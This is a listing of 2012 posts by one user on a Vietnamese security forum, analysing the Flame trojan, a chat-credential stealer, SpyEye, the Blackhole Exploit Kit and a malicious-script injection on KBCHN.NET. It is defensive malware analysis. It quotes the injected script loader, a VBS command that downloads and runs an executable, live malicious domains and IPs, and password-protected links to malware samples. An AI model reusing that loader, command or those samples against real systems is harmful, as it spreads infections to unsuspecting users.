<![CDATA[Messages posted by "miyumi2"]]> /hvaonline/posts/listByUser/258878.html JForum - http://www.jforum.net Mong giúp đỡ - Web bị chèn link /hvaonline/posts/preList/43776/270949.html#270949 /hvaonline/posts/preList/43776/270949.html#270949 GMT Mọi người kiểm tra giúp xem đây có phải virut không Win32:Nebuler.]]> /hvaonline/posts/preList/42626/265051.html#265051 /hvaonline/posts/preList/42626/265051.html#265051 GMT Chiến tranh mạng với trojan W32.Flame, độc gấp 20 lần Stuxnet

chiro8x wrote:
Bồ ơi tớ làm như bồ nói rồi sao wrong password nhỉ, tớ có PM bồ rồi. 
HEX chữ hoa nhe các bạn]]>
/hvaonline/posts/preList/42492/264522.html#264522 /hvaonline/posts/preList/42492/264522.html#264522 GMT
Chiến tranh mạng với trojan W32.Flame, độc gấp 20 lần Stuxnet http://www.mediafire.com/?9kve51vuczzf5rt (pass là mã hex viết liền của tên file, bỏ .ext)
Dump of file 00004784.dl: Code:
3    0 0000E94B QDInit
4    1 0000E94B SetObjectDescriptor
1      0001A817 [NONAME]
2      000206A3 [NONAME]
Dump of file 296e04abb00ea5f18ba021c34e486746: Code:
1    0 00001077 RpcNsBindingInit
Dump of file 37c97c908706969b2e3addf70b68dc13: Code:
2    0 0019DDFC CPlApplet
3    1 0019DE26 DDEInit
4    2 0000108E DDEnumCallback
5    3 00064BF4 GetAuthMechanism
6    4 0019DE71 InprocServer
7    5 000F42C9 QueryValueEx
8    6 000011DE SetAuthMechanism
1    7 000011D6 SetEnumStructure
9    8 000012AD ValueEnumCallback
Dump of file advnetcfg.ocx: Code:
3    0 000030F0 DisableTBS
2    1 00002E9D EnableTBS
1    2 000033A4 UpdateTBSList
Dump of file advnetcfg2.ocx: Code:
3    0 00002B99 DisableTBS
2    1 000029EE EnableTBS
1    2 00002DBD UpdateTBSList
Dump of file msglu32.ocx: Code:
4    0 0000501E QDInit
3    1 000050B2 QDRunW
5    2 00004FDB SetObjectDescriptor
1      000083C0 [NONAME]
2      00008485 [NONAME]
Dump of file mssecmgr.ocx: Code:
2    0 0019DDFC CPlApplet
3    1 0019DE26 DDEInit
4    2 0000108E DDEnumCallback
5    3 00064BF4 GetAuthMechanism
6    4 0019DE71 InprocServer
7    5 000F42C9 QueryValueEx
8    6 000011DE SetAuthMechanism
1    7 000011D6 SetEnumStructure
9    8 000012AD ValueEnumCallback
Dump of file nteps32.ocx: Code:
4    0 00008A44 CreateABHList
14    1 0000B79A CreatePGHDict
7    2 00003E10 DisableDLV
12    3 0000B359 DisableOFR
2    4 000085A4 DisableSHR
6    5 00003D71 EnableDLV
11    6 0000B106 EnableOFR
1    7 00008480 EnableSHR
5    8 00008A89 FreeABHData
3    9 00008942 GetSML
13    A 0000B6D3 GetWPF
10    B 0000657D ReadVBInfo
8    C 000040A8 RestoreSMLData
9    D 0000653A WriteVBInfo
Dump of file soapr32.ocx: Code:
1    0 00001077 RpcNsBindingInit
 
Nhìn sơ qua giống 1 application hơn là 1 virus :) Các file đều để nguyên xi (compile bằng Microsoft Visual C++), không có pack, trừ các "em bé" trong bụng đã được crypt, version info đều ghi giả mạo Microsoft Corporation.]]>
/hvaonline/posts/preList/42492/264499.html#264499 /hvaonline/posts/preList/42492/264499.html#264499 GMT
Chiến tranh mạng với trojan W32.Flame, độc gấp 20 lần Stuxnet
"...Flame còn tinh vi và nguy hiểm gấp 20 lần so với Stuxnet." "...có thể phải mất 10 năm để hiểu được mọi hoạt động mà Flame có thể gây ra." 
- http://vnmedia.vn/VN/cong-nghe/tin-tuc/35_295631/phat_hien_ma_doc_chuyen_doc_trom_email.html - http://www.wired.com/threatlevel/2012/05/flame/ - http://www.forbes.com/sites/timworstall/2012/05/29/the-real-flame-wars-w32-flamer-found-all-over-the-middle-east/ Phân tích kỹ thuật:
http://www.crysys.hu/skywiper/skywiper.pdf 
Con này đã phát tán cách đây từ 5 đến 8 năm, chủ yếu ở khu vực Trung Đông, đặc biệt là Iran, sử dụng tới 5 giải thuật mã hóa, 3 kỹ thuật nén dữ liệu và ít nhất 5 định dạng (format) lưu trữ khác nhau, ngoài ra còn sử dụng cơ sở dữ liệu SQLite 3.6 để lưu trữ thông tin đánh cắp được. Khả năng của mã độc Flame: - Kích hoạt micrô của các máy tính bị nhiễm Flame và ghi lại các cuộc đàm thoại Skype cũng như cuộc nói chuyện của những người gần đó. - Chụp màn hình các email và tin nhắn tức thời cũng như các hoạt động khác. - Bật kết nối Bluetooth, quét tên và số điện thoại liên lạc ghi trên thiết bị. - Quét mạng để dò tìm tên và mật khẩu đăng nhập. - Xóa các tệp tin để xóa sạch dấu vết tồn tại của chúng. (VnMedia)]]>
/hvaonline/posts/preList/42492/264293.html#264293 /hvaonline/posts/preList/42492/264293.html#264293 GMT
Cấu trúc và chức năng kernel mode trong Windows XP. http://msdn.microsoft.com/en-us/library/windows/hardware/ff548173%28v=vs.85%29.aspx
http://en.wikipedia.org/wiki/Architecture_of_Windows_NT
Tài liệu này của Microsoft cũng khá đầy đủ: Windows Kernel Architecture Internals http://research.microsoft.com/en-us/um/redmond/events/wincore2010/Dave_Probert_1.pdf]]>
/hvaonline/posts/preList/42193/262712.html#262712 /hvaonline/posts/preList/42193/262712.html#262712 GMT
Exploit Rogue Scanner (Type 1927)
Chiêu này có lâu rồi nhưng chắc cũng không ít người bị dính! Nếu bạn bấm chạy (Open) file sau khi download/save thì 100% máy bạn đã dính chấu, cần cài 1 phần mềm AV xịn để quét (nhưng chưa chắc sạch hết!).]]>
/hvaonline/posts/preList/42094/262167.html#262167 /hvaonline/posts/preList/42094/262167.html#262167 GMT
virus gắn vào sever web. /hvaonline/posts/preList/42070/262098.html#262098 /hvaonline/posts/preList/42070/262098.html#262098 GMT Xin chỉ cách khắc phục lỗi không hiển thị nội dung web /hvaonline/posts/preList/42054/262058.html#262058 /hvaonline/posts/preList/42054/262058.html#262058 GMT Xin chỉ cách khắc phục lỗi không hiển thị nội dung web /hvaonline/posts/preList/42054/262035.html#262035 /hvaonline/posts/preList/42054/262035.html#262035 GMT Case Study: xoá vết (cover tracks)

hoahongtuoi wrote:

chiro8x wrote:
Thực lòng em không cảm thấy tin tưởng vào các ISP của Việt Nam lắm, chúng ta sử dụng internet thông qua các thiết bị mạng và các thiết bị này được phân phối thông qua các ISP. ISP sẽ biết đích xác là ai dùng thiết bị gì, tại địa điểm nào, username đăng nhập vào hệ thống là gì.  
Đề nghị bạn nói rõ những nhận định mình trích ở trên, sử dụng căn cứ kỹ thuật, không nhận định cảm tính.  
Làm thế nào nhà mạng thống kê được lưu lượng sử dụng internet (dù là cáp đồng, cáp quang hay usb 3G) để cuối tháng in hóa đơn tính tiền cho bạn? Bạn tự tìm hiểu, đó cũng sẽ là lời giải thích cho đề nghị của bạn.]]>
/hvaonline/posts/preList/41388/261899.html#261899 /hvaonline/posts/preList/41388/261899.html#261899 GMT
Trojan đánh cắp danh sách nick chat Facebook, ICQ, YIM, GTalk http://www.mediafire.com/?1ecnlmadgdacsda http://www.mediafire.com/download.php?9bo57outrj3ds7h  Dùng công cụ "mì ăn liền" ra được 1 số kết quả:
http://anubis.iseclab.org/?action=result&task_id=1fb329ad44e85331455b2eb38b97922f9&format=html - HTTP Conversations: From ANUBIS:1029 to 66.220.158.11:80 - [facebook.com] Request: GET / Response: 301 "Moved Permanently" Request: POST /ajax/chat/settings.php?__a=1 Response: 200 "OK" Request: POST /ajax/chat/buddy_list.php?__a=1 Response: 200 "OK" From ANUBIS:1030 to 69.171.242.74:80 - [www.facebook.com] Request: GET / Response: 200 ""  
Kết hợp với data-mining:

 
Tổng hợp các kết quả trên có thể dự đoán tóm tắt các hoạt động của em này như sau:
1. Khi chạy sẽ tự copy vào c:\windows\iqs.exe, đặt registry để tự chạy mỗi khi khởi động máy 2. Mở firewall cho file iqs.exe (đặt tên là Microsoft Firevall Engine và MSN Messenger) 3. Tắt service wuauserv (Window Update), chắc là để vô hiệu hóa tool MRT của Microsoft 4. Vô hiệu hoá các phần mềm anti-virus (Kaspersky, Microsoft Esstential - Windows Defender, AntiVir, Avira, AVG), cách đơn giản là sử dụng hàm API NtTerminateProcess để end task tắt tiến trình process. 5. Tìm các window của các chương trình chat (là ICQ, YIM, GTalk) để lấy danh sách nick chat (sử dụng Windows API: FindWindow, GetWindowText,...), Facebook thì dùng API để gửi HTTP request (POST, GET) và sử dụng Windows API truy cập vào HTML DOM (Internet Explorer_Server, DocObject, IEFrame,...) để lấy dữ liệu, sau đó gửi tất cả về "nơi xa", có thể là compiler.r-t-x.com, hoặc 1 host khác tùy theo master server, cũng có thể kết nối thông qua 1 proxy server 74.208.228.202:5050 để gửi dữ liệu. Tham khảo API FB: - http://security.stackexchange.com/questions/3570/facebook-spam-phishing-attempt - http://www.phpkode.com/source/s/facebook-chat/facebook.class.php - http://imfreedom.org/wiki/Facebook 6. Tự động gửi link lây lan đến các bạn chat trong danh sách (maybe). 7. Đặt lại Trang chủ (Homepage) của các trình duyệt Chrome, Firefox, Internet Explorer, cụ thể đặt link nào thì mình chưa có test tiếp. 
Các hoạt động khác như truy cập history của chương trình chat, history của trình duyệt, chỉnh sửa tham số TCP/IP (Winsock) trên Windows, hook hệ thống... có hay không và cụ thể làm những gì thì mình chưa có thời gian phân tích tiếp.]]>
/hvaonline/posts/preList/42023/261881.html#261881 /hvaonline/posts/preList/42023/261881.html#261881 GMT
tặng ae con giun đầu tay e tóm đc http://eureka.cyber-ta.org/OUTPUT/5b1e1534c828d398b0ae91820913911f/  (trang http://eureka.cyber-ta.org/ unpacked .exe và cho down về).
http://malwr.com/analysis/5b1e1534c828d398b0ae91820913911f/ 
http://anubis.iseclab.org/?action=result&task_id=1f63a15db72d290947595dc73387528ae&format=html 3.d) wuauclt.exe - Network Activity - HTTP Conversations: From ANUBIS:1030 to 91.139.236.32:80 - [losfakers.ru] Request: POST /and/image.php Response: 200 "OK" From ANUBIS:1032 to 89.44.198.188:80 - [losfakers.ru] Request: GET /t.exe Response: 200 "OK" From ANUBIS:1034 to 81.161.207.102:80 - [losfakers.ru] Request: POST /and/image.php Response: 200 "OK"  
Phân tích host:
91.139.236.32 Ventsislav Marinov Sakadjiyski Global Communication Net Plc. 4 Kavala Str. Haskovo Bulgaria 89.44.198.188 CRISTIAN BIRJARU ALTIS NET SRL STR. Marasesti Nr. 9-11 Rosiorii de Vede Teleorman 145100 Romania 81.161.207.102 POL KASKADA Artur Lagodzinski Jana Kilinskiego 35 Jarocin 63-200 Poland 
]]>
/hvaonline/posts/preList/42004/261810.html#261810 /hvaonline/posts/preList/42004/261810.html#261810 GMT
Một dạng fish khá mới SpyEye steals your data. Even in a limited account http://www.prevx.com/blog/149/SpyEye-steals-your-data-Even-in-a-limited-account.html It is a new toolkit called SpyEye.
After this it injects its code inside all the processes it could get access. In every infected process it hooks the following Windows APIs: CryptEncrypt,LdrLoadDll,NtEnumerateValueKey,NtQueryDirectoryFile,NtResumeThread,NtVdmControl This allows the trojan to hide its folder and its registry key from the user's eyes and antivirus software, implementing user mode rootkit techniques. Inside browser processes, the trojan hooks even the following APIs: TranslateMessage,send,HttpSendRequestA,HttpSendRequestW,InternetCloseHandle By doing so, it's able to steal all sensitive data going out through the browser session, even SSL encrypted web pages. Using this technique it is even able to conceptually bypass classic anti-keyloggers that encrypt keystrokes.  
Win32/Spy.SpyEye.B http://www.eset.eu/encyclopaedia/win32-spy-spyeye-b-trojan-pincav-shd-backdoor]]>
/hvaonline/posts/preList/41928/261445.html#261445 /hvaonline/posts/preList/41928/261445.html#261445 GMT
Một dạng fish khá mới "Russia mercenaries" với info.exe:
bannersintpro.org/files/97d19 ligaworldtraders.org/files/97d19 perskitest.org/files/97d19 tartcompanyltd.com/files/97d19  
http://www.mediafire.com/download.php?sf59eb1m6txlbb8 Pass: 123

 
Kết hợp với kết quả RCE của anh TQN thì có thể thấy sự việc như thế này: "ai đó" đã thuê "Russia mercenaries" phát tán trojan (exe hoặc dll), khi nhận được file này thì hacker Nga sẽ nhúng trojan này vào exe engine của họ, engine này có chức năng che dấu trojan của của người thuê (bằng cách hook 1 số hàm API đặc biệt như đã capture ở trên: NtQueryDirectoryFile, NtVdmControl, NtResumeThread,...), sau đó thì họ dùng BlackHole Exploit Kit hoặc các bộ Kit khác để phát tán "sản phẩm cuối cùng" qua mail phishing web, facebook...]]>
/hvaonline/posts/preList/41928/261444.html#261444 /hvaonline/posts/preList/41928/261444.html#261444 GMT
Một dạng fish khá mới http://www.threatexpert.com/report.aspx?md5=46a69641d00f656e5e9b6fedd12f96f3 Trojan này còn hook 1 số hàm API tương đối đặc biệt: 1. Trước khi chạy info.exe

 
2. Các process bị hooked sau khi chạy info.exe

 
]]>
/hvaonline/posts/preList/41928/261412.html#261412 /hvaonline/posts/preList/41928/261412.html#261412 GMT
Một dạng fish khá mới BlackHole Exploit Kit được cài trên máy chủ fb-sv10.co.uk: 1. Các exploit được sử dụng để phát tán malware phiên bản 1.x.x:
CVE-2006-0003 MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution CVE-2007-5659/2008-0655 PDF Exploit -collab, collectEmaillnfo CVE-2008-2992 PDF Exploit• util.printf CVE-2009-0927 PDF Exploit- collab.getlcon CVE-2010-0188 PDF Exploit - LibTiff Integer Overflow CVE-2010-0842 JAVA MIDI Java OBE Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 CVE-2010-1885 Help Center URL Validation Vulnerability CVE-2011-0559 Flash 10 by exm Denial of service (memory corruption) via crafted parameters CVE-2011-3544 Vulnerability in the Rhino Script Engine CVE-2012-0507 Java Atomic CVE-2010-0840 JAVA TC (?) javagetval OBE Java invoke / Java Trust Trusted Method Chaining - Java getValue Remote Code Execution CVE-2010-0886 Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components CVE-2010-3552 JAVA SKYLINE Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows 
2. Minh họa: http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png
Blackhole Exploit Kit control panel http://imperva.typepad.com/.a/6a01156f8c7ad8970c0162fdb83241970d-pi
3. Giá bán/cho thuê: -:-)
1,500 usd/1 năm 1,000 usd/6 tháng 700 usd/3 tháng 
4. Reference:
Danh sách các Exploit Kit và CVE: http://www.mediafire.com/?vwizwswtwx9p1q3 Deconstructing the Black Hole Exploit Kit http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html Blackhole 1.2.3 released http://xylibox.blogspot.com/2012/03/blackhole-v123.html ...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content'). 
]]>
/hvaonline/posts/preList/41928/261380.html#261380 /hvaonline/posts/preList/41928/261380.html#261380 GMT
Một dạng fish khá mới fb-sv02.com fb-sv03.co.uk fb-sv04.co.uk fb-sv05.co.uk fb-sv06.co.uk fb-sv07.co.uk fb-sv08.co.uk fb-sv09.co.uk fb-sv10.co.uk 1. Thông tin người đăng ký:
Registrant: Annette Kathleen Fisher Registrant type: UK Individual Registrant's address: 183 Albion Way Verwood Dorset BH31 7LT United Kingdom Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS] URL: http://www.fasthosts.co.uk 
2. Thông tin kết nối port:
fb-sv07.co.uk Port 22: SSH-2.0-OpenSSH_5.3 Port 80: nginx/0.8.54 ---> http://fb-sv07.co.uk/installation/index.php ;-) fb-sv09.co.uk Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5 Port 80: Server: nginx/0.6.32 fb-sv10.co.uk Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308 Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT Port 80: Server: nginx/1.1.18  
3. Thông tin hosting:
fb-sv07.co.uk (83.69.226.219) LTD AWAX Telecom Moscow, Orlovo-Davydovsky per., 2/5 str 129110 Moscow, Russia +7 495 6264747 +7 495 6264747 fb-sv10.co.uk (79.137.213.115) Digital Network NOC 13a, Yaroslavskaya st., Moscow, Russia, 129366 +7 495 660 8383 +7 495 660 8383 fb-sv02.com (146.185.249.34) Petersburg Internet Network ltd. PIN ROLE Russia, SPb, Sedova 80  
4. Reference:
http://google.com/safebrowsing/diagnostic?site=zaminnews.com/ Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/ http://google.com/safebrowsing/diagnostic?site=eccie.net/ Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine. Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/. http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/ Malicious software includes 92 trojan(s), 48 scripting exploit(s).  
Theo em thì chắc đây là một tổ chức hacker đánh thuê của Nga :) Còn STL có thuê bọn này hay không thì chúng ta cần analyze tiếp dựa trên thông tin tài khoản Facebook đã post comment và payload (info.exe) của BlackHole Kit.]]>
/hvaonline/posts/preList/41928/261376.html#261376 /hvaonline/posts/preList/41928/261376.html#261376 GMT
Một dạng fish khá mới JAVA applet; PDF exploit; HCP protocol exploit; VBS script... Sao thấy giống giống đợt trồng trọt ở KBCHN.NET hé :P Em down được 1 số file đang ngâm cứu thử, obfuscate cho dữ vào nhưng mà đường nào rồi cũng dẫn tới Roma thôi hehe -:|-]]> /hvaonline/posts/preList/41928/261330.html#261330 /hvaonline/posts/preList/41928/261330.html#261330 GMT Nhờ mọi người RCV file exe lạ /hvaonline/posts/list/41645.html#259223 https://www.virustotal.com/file/d8eed1a70a70a6b72e7a398eb50a00877cdaca9f0d8a2dacb6ab4b8aa604e5f3/analysis/]]> /hvaonline/posts/preList/41852/260922.html#260922 /hvaonline/posts/preList/41852/260922.html#260922 GMT Xác Định IP Của Máy Bất Kỳ Bằng Cách nào? http://all-nettools.com/toolbox/environmental-variables-test.php]]> /hvaonline/posts/preList/6193/260776.html#260776 /hvaonline/posts/preList/6193/260776.html#260776 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình :D. Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1. Ý của mình là, duyên cớ nào bạn để ý tới : http://daily.us.to/js/jquery.php Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?. 
Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì. View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi! :) ]]>
/hvaonline/posts/preList/41771/260330.html#260330 /hvaonline/posts/preList/41771/260330.html#260330 GMT
Trojan được chèn vào phần mềm Unikey, Unikey.org bị hacker kiếm soát ODSERV.EXE (nguồn từ fake Unikey) và FBAgent.exe (nguồn từ KBCHN.NET), cả hai cùng chung 1 "big boss" nên từ giờ chắc phải sát nhập 2 topic lại quá :D FakeUnikey_extract_01.zip, topic: /hvaonline/posts/list/41771.html#260312]]> /hvaonline/posts/preList/41404/260314.html#260314 /hvaonline/posts/preList/41404/260314.html#260314 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012)

quygia128 wrote:
Bác miyumi2 extract cái file sao hay vậy ? (File thứ 3 bác gửi lên ấy 101.exe) quy bị terminate với thằng FBAgent.exe mà chưa tìm được giải pháp nè (chạy trên VirtualBox). 
Mình dùng "gậy ông đập lưng ông" tức là lợi dụng chính cái chiêu "Kim Thiền thoát xác" của mèo-què rss.xml đó mà ;-) Bật mí chút xíu là mình dùng chiêu này để moi từ trong bụng con ODSERV.EXE (con đẻ mèo què FakeUnikey, tạo service trong hệ thống với tên odservice) lấy ra được 1 file exe khác cũng có kích thước 59.392 bytes y chang kích thước file 101.exe (nội dung thì có khác đôi chút) :x @TQN: Anh đừng cười nha, em chưa học xong mấy trang bí kiếp RE của anh nên đành dùng chiêu này tạm vậy -:|- FakeUnikey_extract_01.zip: http://www.mediafire.com/download.php?13dbeapfrsmy4va Pass: 123]]>
/hvaonline/posts/preList/41771/260312.html#260312 /hvaonline/posts/preList/41771/260312.html#260312 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

TQN wrote:
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.  
Extract thêm được 1 chú từ FBAgent.exe: http://www.mediafire.com/download.php?yt996448h6z8ci7 Pass: 123]]>
/hvaonline/posts/preList/41771/260256.html#260256 /hvaonline/posts/preList/41771/260256.html#260256 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được. 

]]>
/hvaonline/posts/preList/41771/260246.html#260246 /hvaonline/posts/preList/41771/260246.html#260246 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012)

bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl. Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment). 
Cho mình ngoài lề một chút. Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan. Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET): - http://www.youtube.com/watch?v=zPDnaUo1IPM - www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html (link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?) - CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn P/S: http://www.tienphong.vn/Tim-Kiem/Index.html?keyword=kbchn]]>
/hvaonline/posts/preList/41771/260243.html#260243 /hvaonline/posts/preList/41771/260243.html#260243 GMT
Trang KBCHN.NET bị chèn mã độc (28/3/2012) 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp - Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service). - Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp. File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được. http://www.mediafire.com/download.php?42c4ca67blcfksi Pass: 123]]> /hvaonline/posts/preList/41771/260218.html#260218 /hvaonline/posts/preList/41771/260218.html#260218 GMT Trang KBCHN.NET bị chèn mã độc (28/3/2012) 23h ngày 28/3/2012 (GMT+7) 1. Đoạn mã khởi tạo đầu tiên được chèn vào cuối file http://kbchn.net/js/language/vi.js Code:
document.write('<script language="javascript" src="http://daily.us.to/js/jquery.php"></script>');
2. File jquery.php này chỉ trả về dữ liệu (javascript text) nếu trong HTTP header có: Code:
Referer: http://kbchn.net/
nếu Referer khác sẽ trả về "Error!". 3. Đoạn javascript này Code:
document.write(base64_decode('PGFwcGxldCB3aWR0aD0nMScgaGVpZ2.....
sẽ chèn một JAVA APPLET​​ chạy code thông qua exploit của JRE Code:
http://daily.us.to/js/MediaPlayer.jar
4. Mục đích chạy applet là tạo và thực thi 1 file .vbs (yahadfq.vbs) trong thư mục TEMP, khi file này chạy sẽ dùng CreateObject khởi tạo ADODB.Stream lưu lại file lấy từ 1 URL (dùng WinHttp.WinHttpRequest) Code:
start /MIN %temp%\yahadfq.vbs http://daily.us.to/js/rss.xml %temp%\phfvxlr.exe
--> File rss.xml là 1 exe sau khi tải về sẽ đổi tên thành phfvxlr.exe và chạy. Trong file exe này có 3 resource (TYPELIB 1000, 1010, 1011) với chuỗi header đầu tiên là MSFT. Đến đây em đuối rồi, đi tắm thôi #:S, các anh em nào rảnh thì RE con exe này tiếp xem thế nào. Tất cả các file em thu thập được trong quá trình phân tích: http://www.mediafire.com/?79yupp68ip3ogbq Pass: 123 Cached: Code:
http://liveweb.archive.org/http://kbchn.net/js/language/vi.js
 http://liveweb.archive.org/http://daily.us.to/js/MediaPlayer.jar
 http://liveweb.archive.org/http://daily.us.to/js/rss.xml
]]>
/hvaonline/posts/preList/41771/260203.html#260203 /hvaonline/posts/preList/41771/260203.html#260203 GMT
2-step verification cho router, máy chủ dùng *nix (Microsoft thì khỏi) /hvaonline/posts/preList/41716/259887.html#259887 /hvaonline/posts/preList/41716/259887.html#259887 GMT